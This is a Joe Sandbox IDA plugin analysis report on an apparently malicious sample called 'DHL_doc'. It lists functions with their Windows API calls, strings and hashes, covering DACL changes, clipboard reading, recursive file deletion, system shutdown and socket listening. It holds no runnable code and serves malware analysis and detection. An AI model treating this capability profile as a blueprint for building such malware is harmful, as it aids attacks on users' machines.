Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: c7c7726d32ab5b5ba1e002456b6850d455d709494981e451b45b450c31fa06d7
Instruction ID: 4490b6ac818c909ada94e1827489f5ccb46fa6c258cd706179108c8b4b6ff1b6
Opcode Fuzzy Hash: c7c7726d32ab5b5ba1e002456b6850d455d709494981e451b45b450c31fa06d7
Instruction Fuzzy Hash: 91819971900319AFDF20EFA4EC49BEE7BB9FF09710F044129FA15A61A0C7358A54EB64

Function 00F20B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F21114
Part of subcall function 00F210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F21120
Part of subcall function 00F210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F2112F
Part of subcall function 00F210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F21136
Part of subcall function 00F210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F2114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F20BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F20C00
GetLengthSid.ADVAPI32(?), ref: 00F20C17
GetAce.ADVAPI32(?,00000000,?), ref: 00F20C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F20C6D
GetLengthSid.ADVAPI32(?), ref: 00F20C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F20C8C
HeapAlloc.KERNEL32(00000000), ref: 00F20C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F20CB4
CopySid.ADVAPI32(00000000), ref: 00F20CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F20CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F20D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F20D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F20D45
HeapFree.KERNEL32(00000000), ref: 00F20D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F20D55
HeapFree.KERNEL32(00000000), ref: 00F20D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F20D65
HeapFree.KERNEL32(00000000), ref: 00F20D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00F20D78
HeapFree.KERNEL32(00000000), ref: 00F20D7F

Part of subcall function 00F21193: GetProcessHeap.KERNEL32(00000008,00F20BB1,?,00000000,?,00F20BB1,?), ref: 00F211A1
Part of subcall function 00F21193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F20BB1,?), ref: 00F211A8
Part of subcall function 00F21193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F20BB1,?), ref: 00F211B7

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 697a08b12944fa3498470ac7581b982a239ab09f14d30e0f76a9712043b42bef
Instruction ID: 41869c53645369b8fda9d4d036bf020e5f8fb6122d0105674cfb5acd17731de9
Opcode Fuzzy Hash: 697a08b12944fa3498470ac7581b982a239ab09f14d30e0f76a9712043b42bef
Instruction Fuzzy Hash: D8717A72D0131AAFDF109FA5EC44BAEBBB8FF04311F044115EA15E6292DB75A905EFA0

Function 00F3EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00F5CC08), ref: 00F3EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 00F3EB37
GetClipboardData.USER32(0000000D), ref: 00F3EB43
CloseClipboard.USER32 ref: 00F3EB4F
GlobalLock.KERNEL32(00000000), ref: 00F3EB87
CloseClipboard.USER32 ref: 00F3EB91
GlobalUnlock.KERNEL32(00000000), ref: 00F3EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 00F3EBC9
GetClipboardData.USER32(00000001), ref: 00F3EBD1
GlobalLock.KERNEL32(00000000), ref: 00F3EBE2
GlobalUnlock.KERNEL32(00000000), ref: 00F3EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 00F3EC38
GetClipboardData.USER32(0000000F), ref: 00F3EC44
GlobalLock.KERNEL32(00000000), ref: 00F3EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F3EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F3EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F3ECD2
GlobalUnlock.KERNEL32(00000000), ref: 00F3ECF3
CountClipboardFormats.USER32 ref: 00F3ED14
CloseClipboard.USER32 ref: 00F3ED59

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 49309df82f9c05ceb780fde465420eaee3d85070527189943facf56b8ff3b3b2
Instruction ID: 7df14fc039209e993418edcbe81764d02851e86efddcdf12a888f69afac6f27f
Opcode Fuzzy Hash: 49309df82f9c05ceb780fde465420eaee3d85070527189943facf56b8ff3b3b2
Instruction Fuzzy Hash: DD61CD352043059FD300EF24D889F3AB7E4AF84724F14551DF956972E2CB31D906EBA2

Function 00F3698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F369BE
FindClose.KERNEL32(00000000), ref: 00F36A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F36A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F36A75

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00F36AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F36ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00F36B6A
%02d, xrefs: 00F36C00, 00F36C0A, 00F36C5A, 00F36CAA, 00F36CFA, 00F36D4A
%4d, xrefs: 00F36BB1
%03d, xrefs: 00F36DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00F36B32

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: c5cc9f6d60afc0bbeff013933eb8934201ffd714826c8d36075412ddfd2aa559
Instruction ID: cc37e7dcfe955103cbb56bdc26a0983beba0a0d214f229671524950265a45f3a
Opcode Fuzzy Hash: c5cc9f6d60afc0bbeff013933eb8934201ffd714826c8d36075412ddfd2aa559
Instruction Fuzzy Hash: D1D19272508340AFC314EBA0C986EAFB7ECAF88704F04591DF585D7291EB75DA49CB62

Function 00F39642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F39663
GetFileAttributesW.KERNEL32(?), ref: 00F396A1
SetFileAttributesW.KERNEL32(?,?), ref: 00F396BB
FindNextFileW.KERNEL32(00000000,?), ref: 00F396D3
FindClose.KERNEL32(00000000), ref: 00F396DE
FindFirstFileW.KERNEL32(*.*,?), ref: 00F396FA
SetCurrentDirectoryW.KERNEL32(?), ref: 00F3974A
SetCurrentDirectoryW.KERNEL32(00F86B7C), ref: 00F39768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F39772
FindClose.KERNEL32(00000000), ref: 00F3977F
FindClose.KERNEL32(00000000), ref: 00F3978F

Strings

*.*, xrefs: 00F396F5

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 2b1647df6f4ce7daaec51bc60581ea7708579eed26160c0f2c8837382878285f
Instruction ID: ba15432032eed59edf3af0dbef27b55532d5b3d0dad5dd53801e11545674bc3f
Opcode Fuzzy Hash: 2b1647df6f4ce7daaec51bc60581ea7708579eed26160c0f2c8837382878285f
Instruction Fuzzy Hash: 5431D03294531E6EDB10AFB4DC49ADE37AC9F49331F104055EA16E20A0DBB4DD44AA90

Function 00F3979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F397BE
FindNextFileW.KERNEL32(00000000,?), ref: 00F39819
FindClose.KERNEL32(00000000), ref: 00F39824
FindFirstFileW.KERNEL32(*.*,?), ref: 00F39840
SetCurrentDirectoryW.KERNEL32(?), ref: 00F39890
SetCurrentDirectoryW.KERNEL32(00F86B7C), ref: 00F398AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F398B8
FindClose.KERNEL32(00000000), ref: 00F398C5
FindClose.KERNEL32(00000000), ref: 00F398D5

Part of subcall function 00F2DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F2DB00

Strings

*.*, xrefs: 00F3983B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 2c6481e09884ac341102b550a589e20356b48f7db5d6994f0b42ef57809293bf
Instruction ID: 40d878f64975fa02a322f13148468a281da272a5492c0c0d32bea704a036d3f5
Opcode Fuzzy Hash: 2c6481e09884ac341102b550a589e20356b48f7db5d6994f0b42ef57809293bf
Instruction Fuzzy Hash: 8D31C33290471E6EDB10AFB4EC48ADE77AC9F8A335F504155E911E20A0DBB0DD44EF60

Function 00F38195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F38257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00F38267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F38273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F38310
SetCurrentDirectoryW.KERNEL32(?), ref: 00F38324
SetCurrentDirectoryW.KERNEL32(?), ref: 00F38356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F3838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00F38395

Strings

*.*, xrefs: 00F3839B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: b9e11ec08aa73e1cb533d9b5b4388cfefcfe2aede8318673932ee32745c9c563
Instruction ID: e9effa9fa8cc91d727d460ca8f24df0eb8f784317d140fec165b0bc3e88e854a
Opcode Fuzzy Hash: b9e11ec08aa73e1cb533d9b5b4388cfefcfe2aede8318673932ee32745c9c563
Instruction Fuzzy Hash: A6615A725043459FC710EF60C841A9EB3E8FF89364F04491DF989D7251DB39E946DB92

Function 00F2D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC3A97,?,?,00EC2E7F,?,?,?,00000000), ref: 00EC3AC2

Part of subcall function 00F2E199: GetFileAttributesW.KERNEL32(?,00F2CF95), ref: 00F2E19A

FindFirstFileW.KERNEL32(?,?), ref: 00F2D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F2D1DD
MoveFileW.KERNEL32(?,?), ref: 00F2D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 00F2D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F2D237

Part of subcall function 00F2D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F2D21C,?,?), ref: 00F2D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 00F2D253
FindClose.KERNEL32(00000000), ref: 00F2D264

Strings

\*.*, xrefs: 00F2D0CD, 00F2D0D6, 00F2D0EB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 60e9813d940afe0bee09a227fa6446315eb44eb9ca9a7dfd27fa96223d4c8f2c
Instruction ID: 8f473042387b59dbfd08f87daf5d8fc99844e79eb7e69431fc287d66e568d134
Opcode Fuzzy Hash: 60e9813d940afe0bee09a227fa6446315eb44eb9ca9a7dfd27fa96223d4c8f2c
Instruction Fuzzy Hash: 3D614C31C0121D9ECF05EBE0EA52EEDB7B5AF55304F244169E40277192EB35AF0AEB60

Function 00F3ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00F3ED91
EmptyClipboard.USER32 ref: 00F3ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 00F3EDAC
CloseClipboard.USER32 ref: 00F3EEA3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: aa2115ec0efdff59765f5021b210fdfb552eb60a6588e7707df6aa57b3f08588
Instruction ID: 0a7a5d21b73cd650505abf59733bc5191293ccf2000065824830171465e44a9e
Opcode Fuzzy Hash: aa2115ec0efdff59765f5021b210fdfb552eb60a6588e7707df6aa57b3f08588
Instruction Fuzzy Hash: 71419C35604611AFE320DF15D888F2ABBE1EF44329F15C09DE41A9B6A2C736ED42DBD0

Function 00F2E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00F216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F2170D
Part of subcall function 00F216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F2173A
Part of subcall function 00F216C3: GetLastError.KERNEL32 ref: 00F2174A

ExitWindowsEx.USER32(?,00000000), ref: 00F2E932

Strings

, xrefs: 00F2E95C
SeShutdownPrivilege, xrefs: 00F2E902
@, xrefs: 00F2E925
, xrefs: 00F2E920

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 964ec88f4fbb9e1cddd86eb345e24f4bc329a8a600317b42b189f3257442c09d
Instruction ID: 636c07331031293f244a202b0dd69b17a3d0a2e52ff0f3e937ca4a0344fd6ac8
Opcode Fuzzy Hash: 964ec88f4fbb9e1cddd86eb345e24f4bc329a8a600317b42b189f3257442c09d
Instruction Fuzzy Hash: 6701D673A10335AFEB6466B4BC8ABBF725CAB14751F250423F903E21D1D5A45C84B2D4

Function 00F41204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F41276
WSAGetLastError.WSOCK32 ref: 00F41283
bind.WSOCK32(00000000,?,00000010), ref: 00F412BA
WSAGetLastError.WSOCK32 ref: 00F412C5
closesocket.WSOCK32(00000000), ref: 00F412F4
listen.WSOCK32(00000000,00000005), ref: 00F41303
WSAGetLastError.WSOCK32 ref: 00F4130D
closesocket.WSOCK32(00000000), ref: 00F4133C

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: ab4a8fe78464ab705505f71165aa516c06ca870e18bfdc9d6b5c8d11e6d1d559
Instruction ID: fc4392949ab512cce06a63bd2b4da5a3229fda4faa6d70027084ee35958e4736
Opcode Fuzzy Hash: ab4a8fe78464ab705505f71165aa516c06ca870e18bfdc9d6b5c8d11e6d1d559
Instruction Fuzzy Hash: B8418131A002049FD710DF64C584B2ABBE6BF46329F18818CE9569F392C771ED82DBE1

Function 00F2D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC3A97,?,?,00EC2E7F,?,?,?,00000000), ref: 00EC3AC2

Part of subcall function 00F2E199: GetFileAttributesW.KERNEL32(?,00F2CF95), ref: 00F2E19A

FindFirstFileW.KERNEL32(?,?), ref: 00F2D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 00F2D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F2D481
FindClose.KERNEL32(00000000), ref: 00F2D498
FindClose.KERNEL32(00000000), ref: 00F2D4A1

Strings

\*.*, xrefs: 00F2D3F2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 7a820bff22bf807d1cffff469278a1ebcee813955a11f204d59b934cbb52cf4c
Instruction ID: 269abb9e477b58b17c19942d399acedd6e6847c7c22c98b5654b38fa78de17c4
Opcode Fuzzy Hash: 7a820bff22bf807d1cffff469278a1ebcee813955a11f204d59b934cbb52cf4c
Instruction Fuzzy Hash: AA31C2310083449FC304FF64E951DAF77E8AE91314F445A2DF4D1A3191EB35AA0AD7A3

Function 00EFE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00EFE645

Strings

1#IND, xrefs: 00EFF83D
1#QNAN, xrefs: 00EFF84B
1#INF, xrefs: 00EFF852
1#SNAN, xrefs: 00EFF844

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: c20d9169929254866983ded583c8f9901f6983d445c10103acb693d249bd3192
Instruction ID: 751c0e2205666272b87f33770f43d1b20a96a9afc2aa6f530364a9dba31eff00
Opcode Fuzzy Hash: c20d9169929254866983ded583c8f9901f6983d445c10103acb693d249bd3192
Instruction Fuzzy Hash: B4C21772E0862C8BDB25CE289D407EAB7B5EF84305F1451EAD94DF7291E774AE818F40

Function 00F3648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F364DC
CoInitialize.OLE32(00000000), ref: 00F36639
CoCreateInstance.OLE32(00F5FCF8,00000000,00000001,00F5FB68,?), ref: 00F36650
CoUninitialize.OLE32 ref: 00F368D4

Strings

.lnk, xrefs: 00F364BA, 00F36524, 00F365E0

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: a80c34eebbd60168302c4273080f763d867138c4aaa2ee8f83f6712471ccf681
Instruction ID: fbffc27fde1a401b9c6d9b2b2e57ead75ac74bbbabbe96bbdb8b5cebfe2788fc
Opcode Fuzzy Hash: a80c34eebbd60168302c4273080f763d867138c4aaa2ee8f83f6712471ccf681
Instruction Fuzzy Hash: 57D14B71508341AFC304EF24C981E6BB7E8FF98314F14896DF5959B291DB71E906CBA2

Function 00F422DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00F422E8

Part of subcall function 00F3E4EC: GetWindowRect.USER32(?,?), ref: 00F3E504

GetDesktopWindow.USER32 ref: 00F42312
GetWindowRect.USER32(00000000), ref: 00F42319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F42355
GetCursorPos.USER32(?), ref: 00F42381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F423DF

Memory Dump Source

